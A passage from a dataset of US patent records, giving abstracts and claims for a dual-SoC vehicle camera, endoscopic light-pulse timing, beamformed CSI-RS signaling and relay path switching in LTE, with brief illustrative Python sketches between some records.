a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; wherein said camera comprises a first system on a chip (SoC) that includes an image signal processor that converts image data captured by said camera to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle; wherein said camera comprises a second system on a chip (SoC) that, responsive to said camera capturing image data, communicates video images in a raw image format to said display; wherein said second SoC communicates video images in the raw image format upon initial startup of the vehicle and said camera; wherein the image data communicated by said second SoC is communicated to said display via the communication bus of the vehicle; and wherein said display displays images derived from the communicated video images received from said second SoC. 20. The vision system of claim 19, wherein the driver assistance system comprises at least one of a backup assist system, an adaptive cruise control system, a headlamp control system and a lane departure warning system. | 2,400 |
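The two-SoC split in this record's claims (record 9,107): the first SoC converts captured image data for machine vision and feeds the driver assistance system, while the second SoC forwards unconverted raw frames to the display, so video is available at startup while the first SoC is still warming up (claims 3-5 and 18). A minimal sketch, with invented class and method names:

```python
class VisionPipeline:
    """Hypothetical sketch of the claimed two-SoC architecture: SoC 1 is the
    ISP/machine-vision path with a warm-up delay; SoC 2 is the raw display
    path that is always available."""

    def __init__(self):
        self.soc1_ready = False  # ISP/machine-vision SoC needs warm-up time

    def soc1_output(self, frame):
        """Convert then process the frame for the driver assistance system."""
        if not self.soc1_ready:
            return None  # no driver-assistance output until warm-up completes
        converted = f"converted({frame})"
        return f"assist-output({converted})"

    def soc2_output(self, frame):
        """Raw path to the display: no conversion, available at startup."""
        return f"raw({frame})"
```

In the claims both outputs travel over the vehicle communication bus; the key design point is that the display path never waits on the machine-vision path.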
9,108 | 9,108 | 15,855,915 | 2,482 | The disclosure relates to an endoscopic system that includes an image sensor, an emitter and an electromagnetic radiation driver. The image sensor includes a pixel array and is configured to generate and read out pixel data for an image based on electromagnetic radiation received by the pixel array. The pixel array includes a plurality of lines for reading out pixel data. The pixel array also has a readout period that is the length of time for reading out all the plurality of lines of pixel data in the pixel array. The emitter is configured to emit electromagnetic radiation for illumination of a scene observed by the image sensor. The electromagnetic radiation driver is configured to drive emissions by the emitter. The electromagnetic radiation driver includes a jitter specification that is less than or equal to about 10% to about 25% of the readout period of the pixel array of the image sensor. | 1. An endoscopic system comprising:
an image sensor comprising a pixel array and configured to generate and read out pixel data for an image based on electromagnetic radiation received by the pixel array of the image sensor, wherein the pixel array comprises a plurality of lines for reading out pixel data, and wherein a time length for reading out all the plurality of lines of pixel data in the pixel array comprises a readout period; an emitter configured to emit electromagnetic radiation for illumination of a scene observed by the image sensor; and an electromagnetic radiation driver configured to drive emissions by the emitter, wherein the electromagnetic radiation driver comprises a jitter specification that is less than or equal to about 10% to about 25% of the readout period of the pixel array of the image sensor. 2. The endoscopic system of claim 1, further comprising a controller configured to control the electromagnetic radiation driver to drive the emitter to generate one or more pulses of electromagnetic radiation between a readout period for the image sensor. 3. The endoscopic system of claim 2, wherein the controller is further configured to determine a timing for signals to the electromagnetic radiation driver to pulse electromagnetic radiation for illuminating a scene in an endoscopic environment without overlapping into the readout period for the image sensor. 4. The endoscopic system of claim 2, wherein the readout period starts after reading out a row or column of optical black pixels and the readout period ends with the readout of a row or column of optical black pixels. 5. The endoscopic system of claim 1, wherein a time length for reading out pixel data for a single pixel is a pixel readout length, wherein the electromagnetic radiation driver jitter specification is less than or equal to the pixel readout length of the image sensor. 6. The endoscopic system of claim 1, wherein the image sensor comprises a complementary metal-oxide-semiconductor (CMOS) image sensor. 7. 
The endoscopic system of claim 6, wherein the CMOS image sensor is monochromatic. 8. The endoscopic system of claim 6, wherein the CMOS image sensor is color filtered. 9. The endoscopic system of claim 1, wherein the emitter comprises one or more pulsing lasers. 10. The endoscopic system of claim 1, wherein the electromagnetic radiation driver jitter specification is about 1 microsecond or less. 11. The endoscopic system of claim 1, wherein the electromagnetic radiation driver jitter specification is about 50 nanoseconds or less. 12. The endoscopic system of claim 1, wherein the image sensor is a charge-coupled device (CCD) image sensor. 13. The endoscopic system of claim 12, wherein the CCD image sensor is monochromatic. 14. The endoscopic system of claim 12, wherein the CCD image sensor is color filtered. 15. The endoscopic system of claim 1, wherein the emitter emits a plurality of pulses of electromagnetic radiation, wherein each successive pulse is a different range of wavelengths of electromagnetic energy. 16. The endoscopic system of claim 1, wherein the system further comprises an endoscope comprising a lumen with a distal end, wherein the image sensor is located within the distal end of the lumen of the endoscope. 17. The endoscopic system of claim 1, wherein a time length for reading out a single line of pixel data comprises a line readout length, wherein the electromagnetic radiation driver jitter specification is less than or equal to the line readout length. 18. A method for endoscopic imaging, the method comprising:
generating and reading out pixel data for an image based on electromagnetic radiation received by a pixel array of an image sensor, wherein the pixel array comprises a plurality of lines for reading out pixel data, and wherein a time length for reading out all the plurality of lines of pixel data in the pixel array comprises a readout period; emitting electromagnetic radiation using an emitter; illuminating a scene observed by the image sensor with the electromagnetic radiation emitted from the emitter; and driving emission by the emitter using an electromagnetic radiation driver, the electromagnetic radiation driver comprising a jitter specification that is less than or equal to about 10% to about 25% of the readout period of the pixel array of the image sensor. 19. The method for endoscopic imaging of claim 18, the method further comprising controlling the electromagnetic radiation driver to drive the emitter to generate one or more pulses of electromagnetic radiation between a readout period for the image sensor using a controller. 20. The method for endoscopic imaging of claim 19, wherein the controller determines a timing for signals to the electromagnetic radiation driver to pulse electromagnetic radiation for illuminating a scene in an endoscopic environment without overlapping into the readout period for the image sensor. 21. The method for endoscopic imaging of claim 19, wherein the readout period starts after reading out a row or column of optical black pixels and the readout period ends with the readout of a row or column of optical black pixels. 22. The method for endoscopic imaging of claim 18, wherein a time length for reading out pixel data for a single pixel is a pixel readout length, wherein the jitter specification is less than or equal to the pixel readout length of the image sensor. 23. The method for endoscopic imaging of claim 18, wherein the image sensor comprises a complementary metal-oxide-semiconductor (CMOS) image sensor. 24. 
The method for endoscopic imaging of claim 23, wherein the CMOS image sensor is monochromatic. 25. The method for endoscopic imaging of claim 23, wherein the CMOS image sensor is color filtered. 26. The method for endoscopic imaging of claim 18, wherein the emitter comprises one or more pulsing lasers. 27. The method for endoscopic imaging of claim 18, wherein the electromagnetic radiation driver jitter specification is about 1 microsecond or less. 28. The method for endoscopic imaging of claim 18, wherein the electromagnetic radiation driver jitter specification is about 50 nanoseconds or less. 29. The method for endoscopic imaging of claim 18, wherein the image sensor is a charge-coupled device (CCD) image sensor. 30. The method for endoscopic imaging of claim 29, wherein the CCD image sensor is monochromatic. 31. The method for endoscopic imaging of claim 29, wherein the CCD image sensor is color filtered. 32. The method for endoscopic imaging of claim 18, wherein the method further comprises emitting a plurality of pulses of electromagnetic radiation with the emitter, wherein each successive pulse is a different range of wavelengths of electromagnetic energy. 33. The method for endoscopic imaging of claim 18, wherein the image sensor is located within a distal end of a lumen of an endoscope. 34. The method for endoscopic imaging of claim 18, wherein a time length for reading out a single line of pixel data comprises a line readout length, wherein the jitter specification is less than or equal to the line readout length. | The disclosure relates to an endoscopic system that includes an image sensor, an emitter and an electromagnetic radiation driver. The image sensor includes a pixel array and is configured to generate and read out pixel data for an image based on electromagnetic radiation received by the pixel array. The pixel array includes a plurality of lines for reading out pixel data. 
The pixel array also has a readout period that is the length of time for reading out all the plurality of lines of pixel data in the pixel array. The emitter is configured to emit electromagnetic radiation for illumination of a scene observed by the image sensor. The electromagnetic radiation driver is configured to drive emissions by the emitter. The electromagnetic radiation driver includes a jitter specification that is less than or equal to about 10% to about 25% of the readout period of the pixel array of the image sensor.1. An endoscopic system comprising:
an image sensor comprising a pixel array and configured to generate and read out pixel data for an image based on electromagnetic radiation received by the pixel array of the image sensor, wherein the pixel array comprises a plurality of lines for reading out pixel data, and wherein a time length for reading out all the plurality of lines of pixel data in the pixel array comprises a readout period; an emitter configured to emit electromagnetic radiation for illumination of a scene observed by the image sensor; and an electromagnetic radiation driver configured to drive emissions by the emitter, wherein the electromagnetic radiation driver comprises a jitter specification that is less than or equal to about 10% to about 25% of the readout period of the pixel array of the image sensor. 2. The endoscopic system of claim 1, further comprising a controller configured to control the electromagnetic radiation driver to drive the emitter to generate one or more pulses of electromagnetic radiation between a readout period for the image sensor. 3. The endoscopic system of claim 2, wherein the controller is further configured to determine a timing for signals to the electromagnetic radiation driver to pulse electromagnetic radiation for illuminating a scene in an endoscopic environment without overlapping into the readout period for the image sensor. 4. The endoscopic system of claim 2, wherein the readout period starts after reading out a row or column of optical black pixels and the readout period ends with the readout of a row or column of optical black pixels. 5. The endoscopic system of claim 1, wherein a time length for reading out pixel data for a single pixel is a pixel readout length, wherein the electromagnetic radiation driver jitter specification is less than or equal to the pixel readout length of the image sensor. 6. The endoscopic system of claim 1, wherein the image sensor comprises a complementary metal-oxide-semiconductor (CMOS) image sensor. 7. 
The endoscopic system of claim 6, wherein the CMOS image sensor is monochromatic. 8. The endoscopic system of claim 6, wherein the CMOS image sensor is color filtered. 9. The endoscopic system of claim 1, wherein the emitter comprises one or more pulsing lasers. 10. The endoscopic system of claim 1, wherein the electromagnetic radiation driver jitter specification is about 1 microsecond or less. 11. The endoscopic system of claim 1, wherein the electromagnetic radiation driver jitter specification is about 50 nanoseconds or less. 12. The endoscopic system of claim 1, wherein the image sensor is a charge-coupled device (CCD) image sensor. 13. The endoscopic system of claim 12, wherein the CCD image sensor is monochromatic. 14. The endoscopic system of claim 12, wherein the CCD image sensor is color filtered. 15. The endoscopic system of claim 1, wherein the emitter emits a plurality of pulses of electromagnetic radiation, wherein each successive pulse is a different range of wavelengths of electromagnetic energy. 16. The endoscopic system of claim 1, wherein the system further comprises an endoscope comprising a lumen with a distal end, wherein the image sensor is located within the distal end of the lumen of the endoscope. 17. The endoscopic system of claim 1, wherein a time length for reading out a single line of pixel data comprises a line readout length, wherein the electromagnetic radiation driver jitter specification is less than or equal to the line readout length. 18. A method for endoscopic imaging, the method comprising:
generating and reading out pixel data for an image based on electromagnetic radiation received by a pixel array of an image sensor, wherein the pixel array comprises a plurality of lines for reading out pixel data, and wherein a time length for reading out all the plurality of lines of pixel data in the pixel array comprises a readout period; emitting electromagnetic radiation using an emitter; illuminating a scene observed by the image sensor with the electromagnetic radiation emitted from the emitter; and driving emission by the emitter using an electromagnetic radiation driver, the electromagnetic radiation driver comprising a jitter specification that is less than or equal to about 10% to about 25% of the readout period of the pixel array of the image sensor. 19. The method for endoscopic imaging of claim 18, the method further comprising controlling the electromagnetic radiation driver to drive the emitter to generate one or more pulses of electromagnetic radiation between a readout period for the image sensor using a controller. 20. The method for endoscopic imaging of claim 19, wherein the controller determines a timing for signals to the electromagnetic radiation driver to pulse electromagnetic radiation for illuminating a scene in an endoscopic environment without overlapping into the readout period for the image sensor. 21. The method for endoscopic imaging of claim 19, wherein the readout period starts after reading out a row or column of optical black pixels and the readout period ends with the readout of a row or column of optical black pixels. 22. The method for endoscopic imaging of claim 18, wherein a time length for reading out pixel data for a single pixel is a pixel readout length, wherein the jitter specification is less than or equal to the pixel readout length of the image sensor. 23. The method for endoscopic imaging of claim 18, wherein the image sensor comprises a complementary metal-oxide-semiconductor (CMOS) image sensor. 24. 
The method for endoscopic imaging of claim 23, wherein the CMOS image sensor is monochromatic. 25. The method for endoscopic imaging of claim 23, wherein the CMOS image sensor is color filtered. 26. The method for endoscopic imaging of claim 18, wherein the emitter comprises one or more pulsing lasers. 27. The method for endoscopic imaging of claim 18, wherein the electromagnetic radiation driver jitter specification is about 1 microsecond or less. 28. The method for endoscopic imaging of claim 18, wherein the electromagnetic radiation driver jitter specification is about 50 nanoseconds or less. 29. The method for endoscopic imaging of claim 18, wherein the image sensor is a charge-coupled device (CCD) image sensor. 30. The method for endoscopic imaging of claim 29, wherein the CCD image sensor is monochromatic. 31. The method for endoscopic imaging of claim 29, wherein the CCD image sensor is color filtered. 32. The method for endoscopic imaging of claim 18, wherein the method further comprises emitting a plurality of pulses of electromagnetic radiation with the emitter, wherein each successive pulse is a different range of wavelengths of electromagnetic energy. 33. The method for endoscopic imaging of claim 18, wherein the image sensor is located within a distal end of a lumen of an endoscope. 34. The method for endoscopic imaging of claim 18, wherein a time length for reading out a single line of pixel data comprises a line readout length, wherein the jitter specification is less than or equal to the line readout length. | 2,400 |
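The jitter bound in record 9,108's claim 1 is a fraction of the pixel-array readout period (about 10% to about 25%), where the readout period is the number of lines times the per-line readout time. A small worked calculation, with purely illustrative numbers not taken from the patent:

```python
def jitter_budget_us(lines, line_readout_us, fraction=0.10):
    """Return the allowed driver jitter (microseconds) as a fraction of the
    readout period, per the claim's 10%-25% bound. Inputs are hypothetical
    example values, not figures from the patent."""
    readout_period_us = lines * line_readout_us  # time to read all lines
    return fraction * readout_period_us

# Example: a 1080-line array read at ~15 us/line gives a 16.2 ms readout
# period, so a 10% jitter budget is 1620 us. The claims also recite tighter
# alternatives: <= 1 us, <= 50 ns, or <= the per-line / per-pixel readout time.
```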
9,109 | 9,109 | 16,067,929 | 2,469 | Techniques for measuring CSI (Channel State Information) based on beamformed CSI-RS having reduced overhead are discussed. One example embodiment configured to be employed in a UE (User Equipment) comprises a memory; and one or more processors configured to: process higher layer signaling indicating one or more CSI-RS resources associated with a plurality of REs (Resource Elements) comprising a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks); process additional higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs associated with a beamformed CSI-RS transmission; decode one or more CSI-RSs from the indicated subset; and measure one or more CSI parameters based on the decoded one or more CSI-RSs. | 1-24. (canceled) 25. An apparatus configured to be employed in a User Equipment (UE), comprising:
a memory; and one or more processors configured to:
process higher layer signaling indicating one or more CSI (Channel State Information)-RS (Reference Signal) resources associated with a plurality of REs (Resource Elements) comprising a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks);
process additional higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs associated with a beamformed CSI-RS transmission;
decode one or more CSI-RSs from the indicated subset; and
measure one or more CSI parameters based on the decoded one or more CSI-RSs. 26. The apparatus of claim 25, wherein the one or more CSI-RS parameters comprises a frequency decimation factor equal to N, wherein N is an integer greater than 1, wherein the subset comprises the RE for each CSI-RS resource for each of the one or more CSI-RS APs in each set of N continuous PRBs of the plurality of continuous PRBs. 27. The apparatus of claim 26, wherein the one or more CSI-RS parameters comprises one or more frequency shifts, wherein each frequency shift of the one or more frequency shifts is associated with at least one of the one or more CSI-RS APs. 28. The apparatus of claim 27, wherein the one or more frequency shifts comprises a common frequency shift associated with each of the one or more CSI-RS APs, wherein each set of N continuous PRBs comprises a single PRB that comprises the RE for each CSI-RS resource for each of the one or more CSI-RS APs in that set of N continuous PRBs, and wherein the one or more processors are further configured to determine the single PRB of each set of N continuous PRBs based on the common frequency shift. 29. The apparatus of claim 27, wherein the one or more frequency shifts comprises a first frequency shift associated with a first set of CSI-RS APs of the one or more CSI-RS APs, and a distinct second frequency shift associated with a distinct second set of CSI-RS APs of the one or more CSI-RS APs. 30. The apparatus of claim 25, wherein the one or more CSI-RS parameters indicate the subset of the plurality of REs via a resource allocation indicating a subset of the plurality of continuous PRBs. 31. 
The apparatus of claim 25, wherein the additional higher layer signaling indicates at least one of a time measurement restriction or a frequency measurement restriction, and wherein the one or more processors are configured to measure the one or more CSI parameters based on the at least one of the time measurement restriction or the frequency measurement restriction. 32. The apparatus of claim 25, wherein the subset of the plurality of REs is time-dependent. 33. The apparatus of claim 32, wherein the subset of the plurality of REs is based on a modulo base N of a CSI-RS transmission instance, wherein N is a frequency decimation factor indicated via the additional higher layer signaling. 34. The apparatus of claim 32, wherein the subset of the plurality of REs is based on a pseudo-random sequence. 35. The apparatus of claim 34, wherein the pseudo-random sequence is based on an initialization seed indicated via RRC (Radio Resource Control) signaling. 36. The apparatus of claim 25, wherein the one or more CSI-RS APs comprises one, two, four, or eight CSI-RS APs. 37. An apparatus configured to be employed in an Evolved NodeB (eNB), comprising:
a memory; and one or more processors configured to:
generate a first set of higher layer signaling that configures at least one CSI (Channel State Information)-RS (Reference Signal) resource for a UE, wherein the at least one CSI-RS resource is associated with a plurality of REs (Resource Elements) over a plurality of continuous PRBs (physical resource blocks), and wherein each CSI-RS resource is associated with a CSI-RS pattern comprising a distinct RE for each of one or more CSI-RS APs (Antenna Ports) in each PRB of the plurality of continuous PRBs;
generate a second set of higher layer signaling that indicates a subset of the plurality of REs for a beamformed CSI-RS transmission;
encode a set of beamformed CSI-RS; and
map the set of beamformed CSI-RS to the subset of the plurality of REs. 38. The apparatus of claim 37, wherein the second set of higher layer signaling comprises a frequency decimation factor, N, wherein N is an integer greater than 1, wherein the subset comprises, for each CSI-RS resource, one RE for each of the one or more CSI-RS APs in each set of N continuous PRBs of the plurality of continuous PRBs. 39. The apparatus of claim 38, wherein the second set of higher layer signaling indicates a frequency shift that indicates a single PRB of each set of N continuous PRBs comprises the one RE for each of the one or more CSI-RS APs in each set of N continuous PRBs, and wherein the one or more processors are configured to map the set of beamformed CSI-RS to the single PRB of each set of N continuous PRBs based on the CSI-RS pattern associated with each CSI-RS resource. 40. The apparatus of claim 38, wherein the second set of higher layer signaling indicates at least a first frequency shift and a distinct second frequency shift, wherein the first frequency shift is associated with a first subset of the one or more CSI-RS APs, and wherein the second frequency shift is associated with a distinct second subset of the one or more CSI-RS APs. 41. The apparatus of claim 40, wherein each set of N continuous PRBs comprises a first PRB comprising the one RE for each CSI-RS APs of the first subset of the one or more CSI-RS APs, and comprises a distinct second PRB comprising the one RE for each CSI-RS APs of the distinct second subset of the one or more CSI-RS APs. 42. The apparatus of claim 37, wherein the subset is based at least in part on a CSI-RS transmission instance associated with the set of beamformed CSI-RS. 43. The apparatus of claim 37, wherein the second set of higher layer signaling indicates the subset of the plurality of REs via a resource allocation indicating one or more PRBs of the plurality of continuous PRBs. 44. 
The apparatus of claim 43, wherein the resource allocation indicates the one or more PRBs of the plurality of continuous PRBs via a bitmap. 45. A non-transitory machine readable medium comprising instructions that, when executed, cause a User Equipment (UE) to:
receive first higher layer signaling that indicates one or more CSI (Channel State Information)-RS (Reference Signal) resources associated with a plurality of REs (Resource Elements), wherein the plurality of REs comprises a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks); receive second higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs; receive beamformed CSI-RS via the subset of the plurality of REs; measure one or more CSI parameters based on the received beamformed CSI-RS; and output a CSI report that indicates the measured one or more CSI parameters. 46. The machine readable medium of claim 45, wherein the one or more parameters comprise a frequency decimation factor, N, wherein N is an integer greater than 1, wherein the subset of the plurality of REs comprises one RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each N continuous PRBs of the plurality of continuous PRBs (physical resource blocks). 47. The machine readable medium of claim 45, wherein the one or more parameters comprise a frequency shift that indicates one or more PRBs of the plurality of continuous PRBs, wherein the indicated one or more PRBs comprise the subset of the plurality of REs. 48. The machine readable medium of claim 45, wherein the one or more parameters comprise a first frequency shift and a second frequency shift, wherein the first frequency shift indicates a first set of PRBs of the plurality of continuous PRBs and the second frequency shift indicates a second set of PRBs of the plurality of continuous PRBs, wherein the first set of PRBs comprise REs of the subset of the plurality of REs for a first subset of the one or more CSI-RS APs, and wherein the second set of PRBs comprise REs of the subset of the plurality of REs for a second subset of the one or more CSI-RS APs. 
| Techniques for measuring CSI (Channel State Information) based on beamformed CSI-RS having reduced overhead are discussed. One example embodiment configured to be employed in a UE (User Equipment) comprises a memory; and one or more processors configured to: process higher layer signaling indicating one or more CSI-RS resources associated with a plurality of REs (Resource Elements) comprising a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks); process additional higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs associated with a beamformed CSI-RS transmission; decode one or more CSI-RSs from the indicated subset; and measure one or more CSI parameters based on the decoded one or more CSI-RSs.1-24. (canceled) 25. An apparatus configured to be employed in a User Equipment (UE), comprising:
a memory; and one or more processors configured to:
process higher layer signaling indicating one or more CSI (Channel State Information)-RS (Reference Signal) resources associated with a plurality of REs (Resource Elements) comprising a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks);
process additional higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs associated with a beamformed CSI-RS transmission;
decode one or more CSI-RSs from the indicated subset; and
measure one or more CSI parameters based on the decoded one or more CSI-RSs. 26. The apparatus of claim 25, wherein the one or more CSI-RS parameters comprises a frequency decimation factor equal to N, wherein N is an integer greater than 1, wherein the subset comprises the RE for each CSI-RS resource for each of the one or more CSI-RS APs in each set of N continuous PRBs of the plurality of continuous PRBs. 27. The apparatus of claim 26, wherein the one or more CSI-RS parameters comprises one or more frequency shifts, wherein each frequency shift of the one or more frequency shifts is associated with at least one of the one or more CSI-RS APs. 28. The apparatus of claim 27, wherein the one or more frequency shifts comprises a common frequency shift associated with each of the one or more CSI-RS APs, wherein each set of N continuous PRBs comprises a single PRB that comprises the RE for each CSI-RS resource for each of the one or more CSI-RS APs in that set of N continuous PRBs, and wherein the one or more processors are further configured to determine the single PRB of each set of N continuous PRBs based on the common frequency shift. 29. The apparatus of claim 27, wherein the one or more frequency shifts comprises a first frequency shift associated with a first set of CSI-RS APs of the one or more CSI-RS APs, and a distinct second frequency shift associated with a distinct second set of CSI-RS APs of the one or more CSI-RS APs. 30. The apparatus of claim 25, wherein the one or more CSI-RS parameters indicate the subset of the plurality of REs via a resource allocation indicating a subset of the plurality of continuous PRBs. 31. 
The apparatus of claim 25, wherein the additional higher layer signaling indicates at least one of a time measurement restriction or a frequency measurement restriction, and wherein the one or more processors are configured to measure the one or more CSI parameters based on the at least one of the time measurement restriction or the frequency measurement restriction. 32. The apparatus of claim 25, wherein the subset of the plurality of REs is time-dependent. 33. The apparatus of claim 32, wherein the subset of the plurality of REs is based on a modulo base N of a CSI-RS transmission instance, wherein N is a frequency decimation factor indicated via the additional higher layer signaling. 34. The apparatus of claim 32, wherein the subset of the plurality of REs is based on a pseudo-random sequence. 35. The apparatus of claim 34, wherein the pseudo-random sequence is based on an initialization seed indicated via RRC (Radio Resource Control) signaling. 36. The apparatus of claim 25, wherein the one or more CSI-RS APs comprises one, two, four, or eight CSI-RS APs. 37. An apparatus configured to be employed in an Evolved NodeB (eNB), comprising:
a memory; and one or more processors configured to:
generate a first set of higher layer signaling that configures at least one CSI (Channel State Information)-RS (Reference Signal) resource for a UE, wherein the at least one CSI-RS resource is associated with a plurality of REs (Resource Elements) over a plurality of continuous PRBs (physical resource blocks), and wherein each CSI-RS resource is associated with a CSI-RS pattern comprising a distinct RE for each of one or more CSI-RS APs (Antenna Ports) in each PRB of the plurality of continuous PRBs;
generate a second set of higher layer signaling that indicates a subset of the plurality of REs for a beamformed CSI-RS transmission;
encode a set of beamformed CSI-RS; and
map the set of beamformed CSI-RS to the subset of the plurality of REs. 38. The apparatus of claim 37, wherein the second set of higher layer signaling comprises a frequency decimation factor, N, wherein N is an integer greater than 1, wherein the subset comprises, for each CSI-RS resource, one RE for each of the one or more CSI-RS APs in each set of N continuous PRBs of the plurality of continuous PRBs. 39. The apparatus of claim 38, wherein the second set of higher layer signaling indicates a frequency shift that indicates a single PRB of each set of N continuous PRBs comprises the one RE for each of the one or more CSI-RS APs in each set of N continuous PRBs, and wherein the one or more processors are configured to map the set of beamformed CSI-RS to the single PRB of each set of N continuous PRBs based on the CSI-RS pattern associated with each CSI-RS resource. 40. The apparatus of claim 38, wherein the second set of higher layer signaling indicates at least a first frequency shift and a distinct second frequency shift, wherein the first frequency shift is associated with a first subset of the one or more CSI-RS APs, and wherein the second frequency shift is associated with a distinct second subset of the one or more CSI-RS APs. 41. The apparatus of claim 40, wherein each set of N continuous PRBs comprises a first PRB comprising the one RE for each CSI-RS APs of the first subset of the one or more CSI-RS APs, and comprises a distinct second PRB comprising the one RE for each CSI-RS APs of the distinct second subset of the one or more CSI-RS APs. 42. The apparatus of claim 37, wherein the subset is based at least in part on a CSI-RS transmission instance associated with the set of beamformed CSI-RS. 43. The apparatus of claim 37, wherein the second set of higher layer signaling indicates the subset of the plurality of REs via a resource allocation indicating one or more PRBs of the plurality of continuous PRBs. 44. 
The apparatus of claim 43, wherein the resource allocation indicates the one or more PRBs of the plurality of continuous PRBs via a bitmap. 45. A non-transitory machine readable medium comprising instructions that, when executed, cause a User Equipment (UE) to:
receive first higher layer signaling that indicates one or more CSI (Channel State Information)-RS (Reference Signal) resources associated with a plurality of REs (Resource Elements), wherein the plurality of REs comprises a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks); receive second higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs; receive beamformed CSI-RS via the subset of the plurality of REs; measure one or more CSI parameters based on the received beamformed CSI-RS; and output a CSI report that indicates the measured one or more CSI parameters. 46. The machine readable medium of claim 45, wherein the one or more parameters comprise a frequency decimation factor, N, wherein N is an integer greater than 1, wherein the subset of the plurality of REs comprises one RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each N continuous PRBs of the plurality of continuous PRBs (physical resource blocks). 47. The machine readable medium of claim 45, wherein the one or more parameters comprise a frequency shift that indicates one or more PRBs of the plurality of continuous PRBs, wherein the indicated one or more PRBs comprise the subset of the plurality of REs. 48. The machine readable medium of claim 45, wherein the one or more parameters comprise a first frequency shift and a second frequency shift, wherein the first frequency shift indicates a first set of PRBs of the plurality of continuous PRBs and the second frequency shift indicates a second set of PRBs of the plurality of continuous PRBs, wherein the first set of PRBs comprise REs of the subset of the plurality of REs for a first subset of the one or more CSI-RS APs, and wherein the second set of PRBs comprise REs of the subset of the plurality of REs for a second subset of the one or more CSI-RS APs. | 2,400 |
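The decimation-and-shift rule in claims 26-28 of the record above (one RE-bearing PRB per set of N continuous PRBs, picked by a frequency shift), together with its time-dependent variant in claim 33, can be sketched as follows. The helper name and the shift arithmetic are illustrative assumptions, not 3GPP-normative resource mapping.

```python
def csi_rs_prbs(num_prbs, decimation_n, freq_shift, tx_instance=None):
    """Indices of PRBs carrying CSI-RS REs within a contiguous allocation.

    One PRB out of each set of `decimation_n` continuous PRBs is selected;
    `freq_shift` picks which PRB within each set (claims 26 and 28). If a
    CSI-RS transmission instance is given, the effective shift varies with
    modulo base N of that instance (claim 33). Illustrative only.
    """
    if tx_instance is None:
        shift = freq_shift
    else:
        shift = (freq_shift + tx_instance) % decimation_n
    return [start + shift
            for start in range(0, num_prbs, decimation_n)
            if start + shift < num_prbs]

# 24 contiguous PRBs, decimation factor N=4, common frequency shift 1:
print(csi_rs_prbs(24, 4, 1))     # [1, 5, 9, 13, 17, 21]
# Same allocation at transmission instance 2: shift becomes (1+2) % 4 = 3.
print(csi_rs_prbs(24, 4, 1, 2))  # [3, 7, 11, 15, 19, 23]
```

The overhead reduction is visible directly: with N=4 only a quarter of the PRBs carry CSI-RS REs, which is the point of the beamformed-CSI-RS subset signaling.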
9,110 | 9,110 | 15,128,568 | 2,469 | A server device or a terminal device can perform switching of a path or a communication channel between an infrastructure communication through a network such as an EPC, and a Relay communication through a direct communication with a Relay UE, and can continuously provide a service. A routing information request message includes at least identification information indicating that switching of a communication is required. A third terminal device having a relay function is selected based on the routing information request message. A routing update instruction message which is a response to the routing information request message and includes information of the third terminal device is transmitted to the first terminal device. A direct communication with the third terminal device is performed by using LTE, so as to perform an instruction of communicating with the first terminal device. Thus, a communication channel is switched. | 1. A server device adapted to:
receive a routing-information update request message transmitted by a second terminal device, which performs communication with a first terminal device through a core network, from the first terminal device, the routing-information update request message including at least identification information indicating that switching of a communication is required; select a third terminal device having a relay function, based on the identification information; and transmit a routing update instruction message which is a response to the routing-information update request message, and includes information of the third terminal device, to the first terminal device, and perform an instruction of performing a direct communication with the third terminal device by using LTE, so as to communicate with the first terminal device. 2. The server device according to claim 1, further adapted to:
transmit the routing update instruction message to the second terminal device, and perform an instruction of communicating with the second terminal device which performs the direct communication with the third terminal device by using LTE. 3. A server device adapted to:
lead switching between a first communication in which a communication with a first terminal device is performed through a core network of a second terminal device, and a second communication in which the second terminal device performs a direct communication with a third terminal device so as to communicate with the first terminal device; select the third terminal device having a relay function; and transmit a routing update instruction message including information of the third terminal device, to the second terminal device, and perform an instruction of switching to the second communication. 4. The server device according to claim 3, further adapted to:
transmit the routing update instruction message to the first terminal device, and perform an instruction of communicating with the second terminal device which performs a direct communication with the third terminal by using LTE. 5. A first terminal device which performs a communication with a second terminal device through a core network, the device adapted to:
transmit a routing-information update request message including at least identification information, to a server device by detecting a trigger of switching of a path, the identification information indicating that switching of a communication is required; receive a routing update instruction message including information of a third terminal device which has been selected by the server device and has a relay function, from the server device; and perform a direct communication with the third terminal device in accordance with the routing update instruction message by using LTE, so as to communicate with the second terminal device. | A server device or a terminal device can perform switching of a path or a communication channel between an infrastructure communication through a network such as an EPC, and a Relay communication through a direct communication with a Relay UE, and can continuously provide a service. A routing information request message includes at least identification information indicating that switching of a communication is required. A third terminal device having a relay function is selected based on the routing information request message. A routing update instruction message which is a response to the routing information request message and includes information of the third terminal device is transmitted to the first terminal device. A direct communication with the third terminal device is performed by using LTE, so as to perform an instruction of communicating with the first terminal device. Thus, a communication channel is switched.1. A server device adapted to:
